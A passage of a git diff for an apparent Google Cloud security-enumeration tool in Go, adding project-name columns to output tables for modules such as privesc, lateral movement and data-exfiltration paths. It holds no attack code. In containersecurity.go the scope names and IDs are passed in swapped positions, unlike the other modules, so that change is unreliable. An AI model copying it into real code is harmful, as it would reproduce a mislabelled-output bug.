publicBody = append(publicBody, []string{ bucket.Name, + m.GetProjectName(bucket.ProjectID), bucket.ProjectID, bucket.PublicAccess, bucket.PublicAccessPrevention, @@ -640,6 +648,12 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) Loot: lootFiles, } + // Build scope names from project names map + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + // Write output using HandleOutputSmart with scope support err := internal.HandleOutputSmart( "gcp", @@ -647,9 +661,9 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames (display names) m.Account, output, ) diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go index 02f9390d..ed0fcc1b 100644 --- a/gcp/commands/certmanager.go +++ b/gcp/commands/certmanager.go @@ -318,7 +318,7 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log var tables []internal.TableFile // Combined certificates table - header := []string{"Risk", "Name", "Type", "Domains", "Expires", "Days Left", "Project"} + header := []string{"Risk", "Name", "Type", "Domains", "Expires", "Days Left", "Project Name", "Project ID"} var body [][]string for _, cert := range m.Certificates { @@ -339,6 +339,7 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log domains, cert.ExpireTime, daysLeft, + m.GetProjectName(cert.ProjectID), cert.ProjectID, }) } @@ -361,6 +362,7 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log domains, cert.ExpireTime, daysLeft, + m.GetProjectName(cert.ProjectID), cert.ProjectID, }) } @@ -375,7 +377,7 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log // Certificate maps table if len(m.CertMaps) > 0 { - mapHeader := []string{"Risk", "Name", "Location", "Entries", "Certificates", "Project"} + mapHeader := []string{"Risk", "Name", "Location", "Entries", "Certificates", "Project Name", "Project ID"} var mapBody [][]string for _, certMap := range m.CertMaps { @@ -390,6 +392,7 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log certMap.Location, fmt.Sprintf("%d", certMap.EntryCount), certs, + m.GetProjectName(certMap.ProjectID), certMap.ProjectID, }) } @@ -414,6 +417,12 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log Loot: lootFiles, } + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -422,7 +431,7 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/cloudarmor.go b/gcp/commands/cloudarmor.go index dd8a859a..c1828b4c 100644 --- a/gcp/commands/cloudarmor.go +++ b/gcp/commands/cloudarmor.go @@ -294,7 +294,7 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg // Security policies table if len(m.Policies) > 0 { - header := []string{"Risk", "Policy", "Type", "Rules", "Adaptive", "Resources", "Weaknesses", "Project"} + header := []string{"Risk", "Policy", "Type", "Rules", "Adaptive", "Resources", "Weaknesses", "Project Name", "Project"} var body [][]string for _, policy := range m.Policies { @@ -321,6 +321,7 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg adaptive, resources, weaknessCount, + m.GetProjectName(policy.ProjectID), policy.ProjectID, }) } @@ -347,13 +348,14 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg } if len(unprotectedList) > 0 { - header := []string{"Risk", "Load Balancer", "Project", "Issue"} + header := []string{"Risk", "Load Balancer", "Project Name", "Project", "Issue"} var body [][]string for _, item := range unprotectedList { body = append(body, []string{ "MEDIUM", item.LBName, + m.GetProjectName(item.ProjectID), item.ProjectID, "No Cloud Armor policy attached", }) @@ -379,6 +381,11 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -387,7 +394,7 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go index 82d145ce..075e5e5d 100644 --- a/gcp/commands/cloudbuild.go +++ b/gcp/commands/cloudbuild.go @@ -264,6 +264,7 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg "Config File", "Service Account", "Disabled", + "Project Name", "Project", } @@ -292,6 +293,7 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg trigger.Filename, sa, disabled, + m.GetProjectName(trigger.ProjectID), trigger.ProjectID, }) } @@ -303,6 +305,7 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg "Trigger", "Source", "Created", + "Project Name", "Project", } @@ -314,6 +317,7 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg build.TriggerID, build.Source, build.CreateTime, + m.GetProjectName(build.ProjectID), build.ProjectID, }) } @@ -349,6 +353,7 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg "Service Account", "Privesc", "Reasons", + "Project Name", "Project", } @@ -372,6 +377,7 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg analysis.ServiceAccount, privesc, reasons, + m.GetProjectName(analysis.ProjectID), analysis.ProjectID, }) } @@ -392,6 +398,11 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -400,7 +411,7 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go index 378a4e23..3d698d9f 100644 --- a/gcp/commands/cloudrun.go +++ b/gcp/commands/cloudrun.go @@ -278,6 +278,7 @@ func (m *CloudRunModule) addJobToLoot(job CloudRunService.JobInfo) { func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger) { // Services table servicesHeader := []string{ + "Project Name", "Project ID", "Name", "Region", @@ -325,6 +326,7 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger saDisplay := truncateSA(svc.ServiceAccount) servicesBody = append(servicesBody, []string{ + m.GetProjectName(svc.ProjectID), svc.ProjectID, svc.Name, svc.Region, @@ -341,6 +343,7 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger // Jobs table jobsHeader := []string{ + "Project Name", "Project ID", "Name", "Region", @@ -374,6 +377,7 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger } jobsBody = append(jobsBody, []string{ + m.GetProjectName(job.ProjectID), job.ProjectID, job.Name, job.Region, @@ -418,6 +422,11 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -426,7 +435,7 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go index a241502c..bf0960ab 100644 --- a/gcp/commands/cloudsql.go +++ b/gcp/commands/cloudsql.go @@ -482,6 +482,7 @@ func getDatabaseType(version string) string { func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger) { // Main instances table with enhanced columns header := []string{ + "Project Name", "Project ID", "Name", "Region", @@ -531,6 +532,7 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger } body = append(body, []string{ + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Name, instance.Region, @@ -554,6 +556,7 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger // Security issues table issuesHeader := []string{ "Instance", + "Project Name", "Project ID", "Database", "Issue", @@ -564,6 +567,7 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger for _, issue := range instance.SecurityIssues { issuesBody = append(issuesBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.DatabaseVersion, issue, @@ -574,6 +578,7 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger // Authorized networks table networksHeader := []string{ "Instance", + "Project Name", "Project ID", "Network Name", "CIDR", @@ -589,6 +594,7 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger } networksBody = append(networksBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, network.Name, network.Value, @@ -600,6 +606,7 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger // Backup configuration table backupHeader := []string{ "Instance", + "Project Name", "Project ID", "Backups", "PITR", @@ -621,6 +628,7 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger } backupBody = append(backupBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, boolToYesNo(instance.BackupEnabled), boolToYesNo(instance.PointInTimeRecovery), @@ -634,6 +642,7 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger // Encryption and security configuration table securityConfigHeader := []string{ "Instance", + "Project Name", "Project ID", "Encryption", "KMS Key", @@ -666,6 +675,7 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger } securityConfigBody = append(securityConfigBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.EncryptionType, kmsKey, @@ -729,6 +739,11 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -737,7 +752,7 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/compliancedashboard.go b/gcp/commands/compliancedashboard.go index 5a837e5b..039aeecf 100644 --- a/gcp/commands/compliancedashboard.go +++ b/gcp/commands/compliancedashboard.go @@ -1692,7 +1692,8 @@ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger inte "Severity", "Resource", "Type", - "Project", + "Project Name", + "Project ID", "Risk Score", } @@ -1703,6 +1704,7 @@ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger inte f.Severity, truncateString(f.ResourceName, 50), f.ResourceType, + m.GetProjectName(f.ProjectID), f.ProjectID, fmt.Sprintf("%d", f.RiskScore), }) @@ -1795,6 +1797,12 @@ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger inte Loot: lootFiles, } + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -1804,7 +1812,7 @@ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger inte m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go index 95f80a3f..727099b2 100644 --- a/gcp/commands/composer.go +++ b/gcp/commands/composer.go @@ -137,7 +137,7 @@ func (m *ComposerModule) addToLoot(env composerservice.EnvironmentInfo) { func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger) { header := []string{ "Name", "State", "Location", "Service Account", - "Private", "Airflow URI", "Risk", "Project", + "Private", "Airflow URI", "Risk", "Project Name", "Project", } var body [][]string @@ -167,6 +167,7 @@ func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger private, airflowURI, env.RiskLevel, + m.GetProjectName(env.ProjectID), env.ProjectID, }) } @@ -188,6 +189,7 @@ func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger env.Name, env.RiskLevel, strings.Join(env.RiskReasons, "; "), + m.GetProjectName(env.ProjectID), env.ProjectID, }) } @@ -196,15 +198,20 @@ func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger if len(highRiskBody) > 0 { tables = append(tables, internal.TableFile{ Name: "composer-risks", - Header: []string{"Environment", "Risk Level", "Reasons", "Project"}, + Header: []string{"Environment", "Risk Level", "Reasons", "Project Name", "Project"}, Body: highRiskBody, }) } output := ComposerOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_COMPOSER_MODULE_NAME) } diff --git a/gcp/commands/containersecurity.go b/gcp/commands/containersecurity.go index 0f13080d..05a45152 100644 --- a/gcp/commands/containersecurity.go +++ b/gcp/commands/containersecurity.go @@ -642,7 +642,8 @@ func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger intern // Container Configs table containersHeader := []string{ "Service", - "Project", + "Project Name", + "Project ID", "Location", "Image", "Auth", @@ -654,6 +655,7 @@ func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger intern for _, c := range m.Containers { containersBody = append(containersBody, []string{ c.Name, + m.GetProjectName(c.ProjectID), c.ProjectID, c.Location, truncateString(c.Image, 40), @@ -672,7 +674,8 @@ func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger intern // Env Var Secrets table secretsHeader := []string{ "Service", - "Project", + "Project Name", + "Project ID", "Location", "Env Var", "Type", @@ -683,6 +686,7 @@ func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger intern for _, s := range m.EnvVarSecrets { secretsBody = append(secretsBody, []string{ m.extractServiceName(s.ServiceName), + m.GetProjectName(s.ProjectID), s.ProjectID, s.Location, s.EnvVarName, @@ -694,7 +698,8 @@ func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger intern // Security Issues table issuesHeader := []string{ "Service", - "Project", + "Project Name", + "Project ID", "Issue Type", "Severity", "Affected Area", @@ -705,6 +710,7 @@ func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger intern for _, i := range m.SecurityIssues { issuesBody = append(issuesBody, []string{ i.ServiceName, + m.GetProjectName(i.ProjectID), i.ProjectID, i.IssueType, i.Severity, @@ -716,7 +722,8 @@ func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger intern // Public Services table publicHeader := []string{ "Service", - "Project", + "Project Name", + "Project ID", "Location", "URL", "Auth", @@ -727,6 +734,7 @@ func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger intern for _, p := range m.PublicServices { publicBody = append(publicBody, []string{ p.Name, + m.GetProjectName(p.ProjectID), p.ProjectID, p.Location, truncateString(p.URL, 50), @@ -793,6 +801,12 @@ func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger intern Loot: lootFiles, } + // Build scope names using project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -801,7 +815,7 @@ func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger intern m.Verbosity, m.WrapTable, "project", - m.ProjectIDs, + scopeNames, m.ProjectIDs, m.Account, output, diff --git a/gcp/commands/costsecurity.go b/gcp/commands/costsecurity.go index f9f92935..8d8f196c 100644 --- a/gcp/commands/costsecurity.go +++ b/gcp/commands/costsecurity.go @@ -829,7 +829,8 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo // Cryptomining Indicators table cryptoHeader := []string{ "Resource", - "Project", + "Project Name", + "Project ID", "Location", "Indicator", "Confidence", @@ -840,6 +841,7 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo for _, c := range m.Cryptomining { cryptoBody = append(cryptoBody, []string{ c.Name, + m.GetProjectName(c.ProjectID), c.ProjectID, c.Location, c.Indicator, @@ -851,7 +853,8 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo // Orphaned Resources table orphanedHeader := []string{ "Resource", - "Project", + "Project Name", + "Project ID", "Type", "Location", "Size (GB)", @@ -863,6 +866,7 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo for _, o := range m.Orphaned { orphanedBody = append(orphanedBody, []string{ o.Name, + m.GetProjectName(o.ProjectID), o.ProjectID, o.ResourceType, o.Location, @@ -875,7 +879,8 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo // Cost Anomalies table anomaliesHeader := []string{ "Resource", - "Project", + "Project Name", + "Project ID", "Type", "Anomaly", "Severity", @@ -886,6 +891,7 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo for _, a := range m.CostAnomalies { anomaliesBody = append(anomaliesBody, []string{ a.Name, + m.GetProjectName(a.ProjectID), a.ProjectID, a.ResourceType, a.AnomalyType, @@ -905,7 +911,8 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo // Expensive Resources table expensiveHeader := []string{ "Resource", - "Project", + "Project Name", + "Project ID", "Machine Type", "vCPUs", "Memory GB", @@ -917,6 +924,7 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo for _, e := range m.Expensive { expensiveBody = append(expensiveBody, []string{ e.Name, + m.GetProjectName(e.ProjectID), e.ProjectID, e.MachineType, fmt.Sprintf("%d", e.VCPUs), @@ -974,6 +982,12 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo Loot: lootFiles, } + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -983,7 +997,7 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index 5cf4330e..5320d4f8 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -409,7 +409,9 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo // Cross-project bindings table bindingsHeader := []string{ "Risk", + "Source Project Name", "Source Project", + "Target Project Name", "Target Project", "Principal", "Type", @@ -432,7 +434,9 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo bindingsBody = append(bindingsBody, []string{ binding.RiskLevel, + m.GetProjectName(binding.SourceProject), binding.SourceProject, + m.GetProjectName(binding.TargetProject), binding.TargetProject, principal, binding.PrincipalType, @@ -444,6 +448,7 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo // Cross-project service accounts table sasHeader := []string{ "Service Account", + "Home Project Name", "Home Project", "# Target Projects", "Target Access", @@ -467,6 +472,7 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo sasBody = append(sasBody, []string{ sa.Email, + m.GetProjectName(sa.ProjectID), sa.ProjectID, fmt.Sprintf("%d", len(projectSet)), accessSummary, @@ -476,7 +482,9 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo // Lateral movement paths table pathsHeader := []string{ "Privilege", + "Source Project Name", "Source Project", + "Target Project Name", "Target Project", "Principal", "Method", @@ -498,7 +506,9 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo pathsBody = append(pathsBody, []string{ path.PrivilegeLevel, + m.GetProjectName(path.SourceProject), path.SourceProject, + m.GetProjectName(path.TargetProject), path.TargetProject, principal, path.AccessMethod, @@ -546,6 +556,11 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -554,7 +569,7 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/customroles.go b/gcp/commands/customroles.go index 15a22475..762b5417 100644 --- a/gcp/commands/customroles.go +++ b/gcp/commands/customroles.go @@ -257,6 +257,7 @@ func (m *CustomRolesModule) writeOutput(ctx context.Context, logger internal.Log "Dangerous", "Privesc", "Stage", + "Project Name", "Project", } @@ -277,6 +278,7 @@ func (m *CustomRolesModule) writeOutput(ctx context.Context, logger internal.Log fmt.Sprintf("%d", dangerousCount), fmt.Sprintf("%d", privescCount), role.Stage, + m.GetProjectName(role.ProjectID), role.ProjectID, }) } @@ -287,6 +289,7 @@ func (m *CustomRolesModule) writeOutput(ctx context.Context, logger internal.Log "Role", "Permission", "Description", + "Project Name", "Project", } @@ -306,6 +309,7 @@ func (m *CustomRolesModule) writeOutput(ctx context.Context, logger internal.Log role.Name, perm, dp.Description, + m.GetProjectName(role.ProjectID), role.ProjectID, }) } @@ -316,6 +320,7 @@ func (m *CustomRolesModule) writeOutput(ctx context.Context, logger internal.Log privescHeader := []string{ "Role", "Privesc Permissions", + "Project Name", "Project", } @@ -329,6 +334,7 @@ func (m *CustomRolesModule) writeOutput(ctx context.Context, logger internal.Log privescBody = append(privescBody, []string{ role.Name, perms, + m.GetProjectName(role.ProjectID), role.ProjectID, }) } @@ -372,6 +378,11 @@ func (m *CustomRolesModule) writeOutput(ctx context.Context, logger internal.Log Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -380,7 +391,7 @@ func (m *CustomRolesModule) writeOutput(ctx context.Context, logger internal.Log m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index b8e155b4..8740a8f2 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -559,7 +559,8 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna pathsHeader := []string{ "Type", "Resource", - "Project", + "Project Name", + "Project ID", "Destination", "Risk", } @@ -569,6 +570,7 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna pathsBody = append(pathsBody, []string{ p.PathType, truncateString(p.ResourceName, 30), + m.GetProjectName(p.ProjectID), p.ProjectID, truncateString(p.Destination, 30), p.RiskLevel, @@ -579,7 +581,8 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna exportsHeader := []string{ "Type", "Resource", - "Project", + "Project Name", + "Project ID", "Access Level", "Data Type", "Risk", @@ -590,6 +593,7 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna exportsBody = append(exportsBody, []string{ e.ResourceType, e.ResourceName, + m.GetProjectName(e.ProjectID), e.ProjectID, e.AccessLevel, e.DataType, @@ -630,6 +634,12 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna Loot: lootFiles, } + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -639,7 +649,7 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go index 5a557dbc..df0e2936 100644 --- a/gcp/commands/dataflow.go +++ b/gcp/commands/dataflow.go @@ -129,7 +129,7 @@ func (m *DataflowModule) addToLoot(job dataflowservice.JobInfo) { func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger) { header := []string{ "Name", "Type", "State", "Location", "Service Account", - "Public IPs", "Workers", "Risk", "Project", + "Public IPs", "Workers", "Risk", "Project Name", "Project", } var body [][]string @@ -155,6 +155,7 @@ func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger publicIPs, fmt.Sprintf("%d", job.NumWorkers), job.RiskLevel, + m.GetProjectName(job.ProjectID), job.ProjectID, }) } @@ -176,6 +177,7 @@ func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger job.Name, job.RiskLevel, strings.Join(job.RiskReasons, "; "), + m.GetProjectName(job.ProjectID), job.ProjectID, }) } @@ -184,15 +186,20 @@ func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger if len(highRiskBody) > 0 { tables = append(tables, internal.TableFile{ Name: "dataflow-risks", - Header: []string{"Job", "Risk Level", "Reasons", "Project"}, + Header: []string{"Job", "Risk Level", "Reasons", "Project Name", "Project"}, Body: highRiskBody, }) } output := DataflowOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) } diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go index cb41c621..a9df3508 100644 --- a/gcp/commands/dataproc.go +++ b/gcp/commands/dataproc.go @@ -141,7 +141,7 @@ func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger var tables []internal.TableFile // Clusters table - header := []string{"Name", "Region", "State", "Master", "Workers", "Service Account", "Public IPs", "Kerberos", "Risk", "Project"} + header := []string{"Name", "Region", "State", "Master", "Workers", "Service Account", "Public IPs", "Kerberos", "Risk", "Project Name", "Project"} var body [][]string for _, cluster := range m.Clusters { publicIPs := "No" @@ -171,6 +171,7 @@ func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger publicIPs, kerberos, cluster.RiskLevel, + m.GetProjectName(cluster.ProjectID), cluster.ProjectID, }) } @@ -188,6 +189,7 @@ func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger cluster.Name, cluster.RiskLevel, strings.Join(cluster.RiskReasons, "; "), + m.GetProjectName(cluster.ProjectID), cluster.ProjectID, }) } @@ -196,7 +198,7 @@ func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger if len(highRiskBody) > 0 { tables = append(tables, internal.TableFile{ Name: "dataproc-risks", - Header: []string{"Cluster", "Risk Level", "Reasons", "Project"}, + Header: []string{"Cluster", "Risk Level", "Reasons", "Project Name", "Project"}, Body: highRiskBody, }) } @@ -210,8 +212,13 @@ func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger output := DataprocOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAPROC_MODULE_NAME) } diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go index 122bfd3f..ccc55923 100644 --- a/gcp/commands/dns.go +++ b/gcp/commands/dns.go @@ -271,6 +271,7 @@ func (m *DNSModule) addRecordToLoot(record DNSService.RecordInfo, zone DNSServic func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { // Zones table zonesHeader := []string{ + "Project Name", "Project ID", "Zone Name", "DNS Name", @@ -306,6 +307,7 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { } zonesBody = append(zonesBody, []string{ + m.GetProjectName(zone.ProjectID), zone.ProjectID, zone.Name, zone.DNSName, @@ -379,6 +381,11 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -387,7 +394,7 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go index 868d64d0..cda4a84d 100644 --- a/gcp/commands/domainwidedelegation.go +++ 